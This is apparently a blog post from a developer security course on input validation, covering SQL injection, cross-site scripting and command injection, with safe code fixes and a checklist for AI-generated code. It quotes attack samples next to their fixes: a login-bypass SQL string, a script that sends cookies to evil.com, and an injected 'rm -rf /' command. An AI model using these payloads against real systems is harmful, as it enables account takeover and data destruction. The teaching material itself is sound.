Input Validation: Never Trust What Users Type
Security First — Part 15 of 30
The Story That Should Keep You Up at Night
September 2025. A fintech company worth two billion dollars. A developer — probably using an AI coding tool, moving fast, shipping features — built a login page. The AI generated clean-looking code. It worked perfectly in testing. Users could log in and log out without a hitch.
There was just one problem: the login code skipped input validation entirely. An attacker found the endpoint, typed a carefully crafted string into the email field, and bypassed authentication completely. No password needed. Just a few characters in a text box, and the front door to the entire platform swung open.
According to The Hacker News' 2025 web security retrospective, this is not a fringe incident. AI-generated code skips input validation regularly — and 45% of all AI-generated code contains exploitable flaws from the OWASP Top 10 list. Vibe coders who ship without understanding this concept are one unlucky afternoon away from a headline.
Today we fix that.
What Is Input Validation, Really?
Every application accepts data from the outside world. Users type into forms. They paste URLs. They upload files. They send API requests. Every single one of those inputs is, by default, untrusted — because you have no idea what's in it.
Input validation is the practice of checking that data is what you expect before you do anything with it.
That's it. That's the whole concept. But the failure to do it consistently is responsible for some of the most catastrophic breaches in software history.
Think of it like a nightclub bouncer. You don't just wave everyone through the door because they showed up. You check IDs. You verify they meet the requirements. You turn away anyone who doesn't belong. Your database — and your users — are the people inside the club. Input validation is the bouncer.
The Three Attacks You Need to Understand
1. SQL Injection: Talking Directly to Your Database
SQL injection is 27 years old. It was discovered in 1998. It is still — in 2025 and 2026 — actively emptying databases and bringing down production systems.
Here's why it keeps working: most applications use a database, and most databases speak SQL. When your app accepts user input and builds a database query with it, you're essentially letting the user write part of your SQL.
Let's say you have a login form. Your backend code (maybe AI-generated, maybe not) looks like this:
# DANGEROUS — never do this
query = "SELECT * FROM users WHERE email = '" + email_input + "' AND password = '" + password_input + "'"
cursor.execute(query)
A normal user types alice@example.com and their password. Fine. But an attacker types this into the email field:
' OR '1'='1' --
Your query becomes:
SELECT * FROM users WHERE email = '' OR '1'='1' --' AND password = ''
The -- comments out the rest of the line. The condition '1'='1' is always true. Your application logs the attacker in as the first user in the database — often an admin.
No password. No hack. Just a text box and 15 characters.
According to OWASP's 2025 Top 10, injection remains the #5 most critical vulnerability in web applications, affecting 100% of applications tested in some form. In May 2025, a government portal was breached via SQL injection, exposing sensitive citizen data. A China-linked threat actor was documented by Trend Micro in May 2025 as systematically targeting SQL injection vulnerabilities in internet-exposed SQL Servers across Brazil, India, and Southeast Asia — deploying ransomware after gaining access.
The fix: Use parameterized queries (also called prepared statements). Always. No exceptions.
# SAFE — always do this
query = "SELECT * FROM users WHERE email = %s AND password = %s"
cursor.execute(query, (email_input, password_input))
With parameterized queries, the database treats user input as data, never as instructions. The attacker's ' OR '1'='1' -- just gets looked up literally in the email column. It finds nothing. Attack foiled.
In JavaScript with a library like pg (PostgreSQL):
// SAFE
const result = await pool.query(
  'SELECT * FROM users WHERE email = $1 AND password = $2',
  [emailInput, passwordInput]
);
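You can watch the defense work in a few lines with an in-memory SQLite database (the table, rows, and column names here are invented purely for the demo):

```python
import sqlite3

# Throwaway in-memory database with one made-up admin account
db = sqlite3.connect(":memory:")
db.execute("CREATE TABLE users (email TEXT, password TEXT)")
db.execute("INSERT INTO users VALUES ('admin@example.com', 'hunter2')")

payload = "' OR '1'='1' --"

# VULNERABLE: string concatenation lets the payload rewrite the query
unsafe = ("SELECT * FROM users WHERE email = '" + payload +
          "' AND password = ''")
print(db.execute(unsafe).fetchall())  # returns the admin row -- logged in!

# SAFE: the parameterized query treats the payload as a literal email string
safe = "SELECT * FROM users WHERE email = ? AND password = ?"
print(db.execute(safe, (payload, "")).fetchall())  # [] -- attack foiled
```

The same payload that bypasses the concatenated query finds zero rows in the parameterized one, because the driver never lets it touch the query's structure.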
2. Cross-Site Scripting (XSS): Injecting Code Into Your Own Pages
XSS is what happens when your app takes user input and displays it back on a page without sanitizing it first. The attacker doesn't attack the server — they attack other users of your app by making your site serve their malicious code.
Imagine a comment form on your blog. A user submits:
<script>document.location='https://evil.com/steal?cookie='+document.cookie</script>
If you store that and display it on the page without escaping it, every visitor who loads that page sends their session cookie to the attacker. The attacker logs in as them. Account takeover, at scale.
Microsoft's security research in November 2025 documented how XSS gets chained with other vulnerabilities to escalate into full account takeover and even remote code execution. One technique they outlined: an attacker embeds an XSS payload in a JSON field; a logging service writes it to an admin-facing HTML viewer; the admin's browser executes the payload and exfiltrates their authentication token. The attacker then takes over the admin account.
In 2025, over 150,000 websites were compromised in a single gambling-related JavaScript injection campaign, and fifty thousand banking sessions were hijacked by malware that used real-time page-structure detection to inject scripts.
The fix: Escape output. When you display anything that came from a user, encode it so HTML characters become harmless text.
In Python with Jinja2 (Flask's default templating engine — autoescaping is on by default):
# Jinja2 auto-escapes in HTML templates — this is safe
# {{ user_comment }} renders as escaped text, not HTML
return render_template('post.html', user_comment=user_input)
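If you ever need to escape outside a templating engine, Python's standard library handles it (the comment string below is just an illustration):

```python
import html

# A hypothetical malicious comment submitted by a user
comment = "<script>document.location='https://evil.com/steal'</script>"

# Escaping converts HTML metacharacters into inert entities
escaped = html.escape(comment)
print(escaped)  # &lt;script&gt;... renders as visible text, never executes
```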
In JavaScript/React (JSX automatically escapes values):
// SAFE — React escapes this automatically
function Comment({ text }) {
  return <p>{text}</p>;
}

// DANGEROUS — this disables React's escaping
function Comment({ text }) {
  return <p dangerouslySetInnerHTML={{ __html: text }} />;
}
See that dangerouslySetInnerHTML? React named it that on purpose. If you're using it with user-supplied content and you're not sanitizing, you have an XSS vulnerability.
3. Command Injection: Handing a Shell to Strangers
Some apps pass user input to the operating system shell. Image converters, file processors, CLI wrappers. If you're not careful, you hand the user a command prompt on your server.
# DANGEROUS — never pass user input to shell=True
import subprocess
filename = request.args.get('file')
subprocess.run(f"convert {filename} output.jpg", shell=True)
An attacker requests: ; rm -rf / #
Your server runs: convert ; rm -rf / # output.jpg
The fix: Pass arguments as a list, never as a shell string:
# SAFE
subprocess.run(["convert", filename, "output.jpg"])
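To see why the list form is safe, echo the malicious "filename" through a child process (the demo uses the Python interpreter itself so it runs anywhere):

```python
import subprocess
import sys

filename = "; rm -rf / #"  # hypothetical attacker-supplied value

# The list form passes the string as a single argv entry; no shell ever
# parses it, so the semicolon has no special meaning
result = subprocess.run(
    [sys.executable, "-c", "import sys; print(sys.argv[1])", filename],
    capture_output=True, text=True,
)
print(result.stdout)  # the dangerous string is printed literally, not executed
```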
The Vibe Coding Problem
Here's the uncomfortable truth: AI coding tools are making this worse before they make it better.
A March 2026 Forbes analysis found that security vulnerabilities are up to 2.74 times more common in AI-generated code. The Kaspersky security blog documented a specific pattern: AI models are optimized to produce code that works — that passes tests, that compiles, that satisfies the prompt. Security is not part of the optimization function.
The Enrichlead startup case is instructive. The founder proudly announced that 100% of the platform's code was written by Cursor AI. Days after launch, researchers found anyone could access paid features or alter other users' data. The app shut down. The problem? Lack of input validation, missing sanitization, and authentication logic implemented entirely on the client side — all classic AI code generation failure modes.
When you ask an AI to "make a login form," it will make you a login form. It probably won't add input validation unless you explicitly ask. And if you iterate on that code 40 times via follow-up prompts — adding features, fixing bugs — a GPT-4o study found the code accumulates 37% more critical vulnerabilities than the initial version after just five iterations.
You are the security layer the AI doesn't provide.
A Practical Input Validation Checklist
Use this every time you build a form, an API endpoint, or any code that accepts user input:
Validate Type and Format
import re

def validate_email(email: str) -> bool:
    pattern = r'^[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}$'
    return bool(re.match(pattern, email)) and len(email) <= 254

def validate_age(age_str: str) -> int:
    age = int(age_str)  # Raises ValueError if not a number
    if not (0 <= age <= 150):
        raise ValueError("Age out of range")
    return age
Validate on the Server, Not Just the Browser
Client-side validation (JavaScript in the browser) is a UX nicety. It is not security. Anyone can open DevTools, disable your JavaScript, and send raw HTTP requests directly to your server. Always validate on the server.
// In Express.js — server-side validation
const { body, validationResult } = require('express-validator');
app.post('/register', [
  body('email').isEmail().normalizeEmail(),
  body('username').isAlphanumeric().isLength({ min: 3, max: 20 }),
  body('age').isInt({ min: 13, max: 120 })
], (req, res) => {
  const errors = validationResult(req);
  if (!errors.isEmpty()) {
    return res.status(400).json({ errors: errors.array() });
  }
  // Safe to proceed
});
Use an Allowlist, Not a Blocklist
Don't try to block "bad" characters — there are too many ways to encode them. Instead, define exactly what you will accept.
# BAD — trying to block bad input
def clean_username_bad(username):
    return username.replace("'", "").replace(";", "").replace("--", "")
# Attackers know dozens of ways around this

# GOOD — only allow what you expect
import re

def clean_username_good(username):
    if not re.match(r'^[a-zA-Z0-9_]{3,20}$', username):
        raise ValueError("Username must be 3-20 alphanumeric characters")
    return username
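A quick check shows why the allowlist wins: encoded or exotic payloads don't need to be enumerated one by one, they simply fail the pattern (the sample usernames below are invented):

```python
import re

# Allowlist: 3-20 characters, letters, digits, and underscore only
ALLOWED = re.compile(r'^[a-zA-Z0-9_]{3,20}$')

candidates = ["alice", "bob_99", "a'; DROP TABLE users;--", "%27OR%201=1", "ab"]
accepted = [name for name in candidates if ALLOWED.fullmatch(name)]
print(accepted)  # ['alice', 'bob_99']
```

Every injection attempt is rejected without the code knowing anything about SQL, URL encoding, or comment syntax.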
Parameterize Every Database Query
This deserves its own line item because it's that important:
# SQLAlchemy ORM (Python) — safe by default
user = db.session.query(User).filter_by(email=email_input).first()
# Raw SQL if you must — parameterize it
cursor.execute("SELECT * FROM users WHERE email = ?", (email_input,))
// Prisma ORM (TypeScript) — safe by default
const user = await prisma.user.findUnique({
  where: { email: emailInput }
});

// Raw query if needed: the tagged template is parameterized by Prisma, not string-concatenated
const user = await prisma.$queryRaw`SELECT * FROM users WHERE email = ${emailInput}`;
Encode Output
When writing user-supplied data back to HTML, encode it:
// Using DOMPurify for user-generated HTML content (like a rich text editor)
import DOMPurify from 'dompurify';
const safeHTML = DOMPurify.sanitize(userInput);
document.getElementById('output').innerHTML = safeHTML;
Quick Prompt Additions for AI-Generated Code
When you use Cursor, Claude, Copilot, or any AI tool to generate code that handles user input, add these to your prompt:
Generate [your feature]. Requirements:
- Validate all user inputs server-side before processing
- Use parameterized queries for all database operations
- Escape/encode all user-supplied data before rendering in HTML
- Do NOT use string concatenation to build SQL queries
- Do NOT use shell=True with user-supplied input
Adding these few lines to your prompts will catch the majority of AI-generated input validation failures.
Your Security Checklist for This Week
- Audit your forms. List every input field in your app. Confirm each one has server-side validation.
- Check your database queries. Search your code for string concatenation with variables going into SQL (+ or f-strings in query strings). Replace with parameterized queries.
- Search for dangerouslySetInnerHTML, innerHTML =, document.write, or eval. Any of these with user data = XSS risk.
- Search for shell=True. Any subprocess calls with shell=True and user input are command injection risks.
- Add security requirements to your AI prompts. Copy-paste the prompt additions above into your default system prompt or project instructions.
- Test your own inputs. In a search box or form field, try typing ', ", <script>alert(1)</script>, and ' OR '1'='1. Your app should handle these gracefully — not crash, not expose data, not execute them.
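Several of these code searches can be automated with a small grep-style script (the file extensions and patterns below are illustrative, not exhaustive):

```python
import pathlib
import re

# Risky patterns from the checklist above (illustrative, not exhaustive)
RISKY_PATTERNS = [
    r"shell\s*=\s*True",
    r"dangerouslySetInnerHTML",
    r"\binnerHTML\s*=",
    r"document\.write",
    r"\beval\s*\(",
]

def audit(root: str) -> list[tuple[str, str]]:
    """Return (file, pattern) pairs for every risky pattern found under root."""
    hits = []
    for path in pathlib.Path(root).rglob("*"):
        if path.suffix not in {".py", ".js", ".jsx", ".ts", ".tsx"}:
            continue
        text = path.read_text(errors="ignore")
        for pattern in RISKY_PATTERNS:
            if re.search(pattern, text):
                hits.append((str(path), pattern))
    return hits
```

A hit is not automatically a bug; it is a place where you must confirm no user input reaches the call.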
Ask The Guild
This week's community prompt: Have you found an input validation issue in AI-generated code — in your own project or someone else's? What did the AI get wrong, and how did you fix it? Drop your story in the #security-first channel. The most educational example gets featured in the Week 3 recap.
Tom Hundley has been building and breaking software systems for 25 years. He teaches security fundamentals to the next generation of AI-assisted developers at the AI Coding Guild.
Sources:
- The Hacker News: 5 Threats That Reshaped Web Security in 2025
- OWASP Top 10:2025 — A05 Injection
- Forbes: Vibe Coding Has a Massive Security Problem (March 2026)
- Microsoft MSRC: Weaponizing Cross-Site Scripting (November 2025)
- The Hacker News: China-Linked Hackers Exploit SAP and SQL Server Flaws (May 2025)
- IntelligenceX: A05:2025 Injection — The Persistent Threat
- Kaspersky: Security Risks of Vibe Coding and LLM Assistants (October 2025)
- Checkmarx: Security in Vibe Coding (March 2026)